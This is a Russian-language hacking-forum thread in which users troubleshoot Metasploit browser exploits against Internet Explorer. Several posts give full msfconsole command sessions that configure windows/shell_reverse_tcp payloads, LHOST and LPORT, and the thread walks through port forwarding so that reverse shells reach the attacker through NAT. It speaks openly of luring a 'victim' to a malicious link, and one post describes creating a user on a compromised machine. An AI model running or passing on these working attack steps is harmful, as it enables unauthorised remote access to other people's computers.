где-то я находил, то-ли когда только вышла 3-я версия... вообщем тут надо поискать: https://forum.antichat.ru/threadnav28601-1-10.html либо в последующих статьях см. карту https://forum.antichat.ru/thread19610.html (в конце, там ссылки на статьи по MSF)
Пробрасывай порты, через NAT не достучится до твоего компа реверс-шелл (обсуждалось уже не раз). Тоже самое: всякие прокси, файрволы и не прозрачные роутеры на пути к твоему компу из Инета (а так же и с компа клиента - жертвы).
Поставил metasploit на linux, а вот как его обновлять, в винде там для обновления пункт в меню есть, а здесь как быть?
Привет всем. Подскажите что не так? в конце вылазит, что не получилось >> use windows/browser/ms06_013_createtextrange >> set SRVHOST 172.21.35.24 SRVHOST => 172.21.35.24 >> set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp >> exploit [-] Exploit failed: The following options failed to validate: LHOST.
Забыл указать параметр LHOST - куда должен приконнектися реверсшелл. - Это твой внешний ИП если юзаешь в нете, либо внутренний, если в локалке только раздаёшь ссылку.
Видимо что-то я не допонял: >> set LHOST 172.21.35.24 LHOST => 172.21.35.24 >> set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp >> set URIPATH svegaya_baga URIPATH => svegaya_baga >> exploit [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/svegaya_baga [*] Server started. [*] Exploit running as background job. Почему URL не тот, который нужен
попробуй укажи LHOST - после выбора начинки начинки, т.е после set PAYLOAD. Кроме того http://0.0.0.0:8080 - говорит о том что сервер метасплоита ждёт подключений на любом сетевом интерфейсе. При "впаривании" ссылки IP в ней меняем на внешний + обеспечивай переадресацию с внешнего IP на внутренний IP входящих подключений. Переключиться в сессию: набрать sessions -i (или глянь help)
Уважаемый -=lebed=-, с версией 3.0 не получается даже на самого себя, с 2.7 получилось. НО пробую на соседний комп - тоже не получается, вот лог: msf > ls framework framework.tar msfupdate run_msfconsole run_msfupdat msf > cd framework msfconsole: chdir: changed to directory framework msf > ls exploits ........... msf > use ie_xp_pfv_metafile msf ie_xp_pfv_metafile > info ie_xp_pfv_metafile ............................ Exploit: Name Default Description -------- -------- ------- -------------------------- optional REALHOST External address to use fo optional HTTPHOST 0.0.0.0 The local HTTP listener ho required HTTPPORT 8080 The local HTTP listener po ..................... msf ie_xp_pfv_metafile > show payloads ......................... msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf ie_xp_pfv_metafile(win32_reverse) > info win32_reverse ............................... Available Options: Options: Name Default Description -------- -------- ------- -------------------------- required EXITFUNC seh Exit technique: "process", required LHOST Local address to receive c required LPORT 4321 Local port to receive conn ................................. msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 172.21.35.24 LHOST -> 172.21.35.24 msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://127.0.0.1:8080/ [*] HTTP Client connected from 172.21.35.20:4504, redirecting... и на этом все останавливается. Мой ип ...24, его ...20, почему соединение ждет на 127.0.0.1 Когда он идет ко мне на 172.21.35.24, то на редиректе все останавливается. ????
Потому что 127.0.0.1 - это локалхост - так что тут всё верно, редирект идёт потому что реверсшелл не пожет приконектится по опр. портам. Пробуй указать явно свободный порт - параметр LPORT 4321, кроме того файрволы могут мешать... P.S. И вообще сплоит-то пробивает браузер IE? (должен файлик картинки загрузится автоматически и затем стандартный просмотрщик факсов должен пытаться его открыть на машине жерты)
А чтол за фигня? Скачал Metasploit 3.... Как запускать через консоль... На рабьочем столе файла не появилось и в паке msfconsole не пашет... как его зщапустить? рашеь толкьо через веб. А я хочу через консоль, в чем проблема?
В какой-то версии консоль MSF есть только в WEB, т.е. эмулирована через веб-интерфейс (скорее всего тебе такая версия попалась).
есть некая проблема со сплоитом комп работает через роутер в строку LHOST я ввожу свой лок адрес к примеру 192.168.0.5 ну с портом все понятно а вот в строке RHOST нужно вводить внешний ип если я ввожу внешний к примеру 10.35.56.20 то при компиляции выходит ошибка, а если локальный 192.168.0.5 то все пашет, но проблемма в том что такую сылку видят только локальные компы а внешние нет, как решить проблему ? испоользовал версии 3,0 3,2
10.35.56.20 - это тоже локальный IP (подсеть класса А). RHOST можно не задавать совсем, главное обеспечить переадресацию на роутере с внешнего IP на внутренний, где висит вебсервер метасплоита. Как это сделать, всё зависит от того, какие узлы стоят на пути выхода в Интнернет. (компы-роутеры, ADSL-модем-роутер, управляемые свичи и т.д.) Т.е. сначала надо решить задачу доступности вебсервера в сети интернет по внешнему IP, а затем и возможность коннекта реверсшелла к этому компу (переадресация по портам <5000) P.S. Сделай комманду tracert google.ru там увидишь что на пути расположено до выхода в глобальную сеть, первый IP из нелокальных диапозонов и будет внешним IP. 10.35.56.20 - это у тебя ещё один роутер на пути в Интернет.
Подскажите пожалуйсто как решить проблему с кодировкой в Metasploit framework_v3.2 под windows. Проблема собственно том что все русские буквы отображаються вопросиками, chcp не помогает В итоге захожу на комп создаю юзера, но не могу его добавить в Администраторы. Что посоветуете?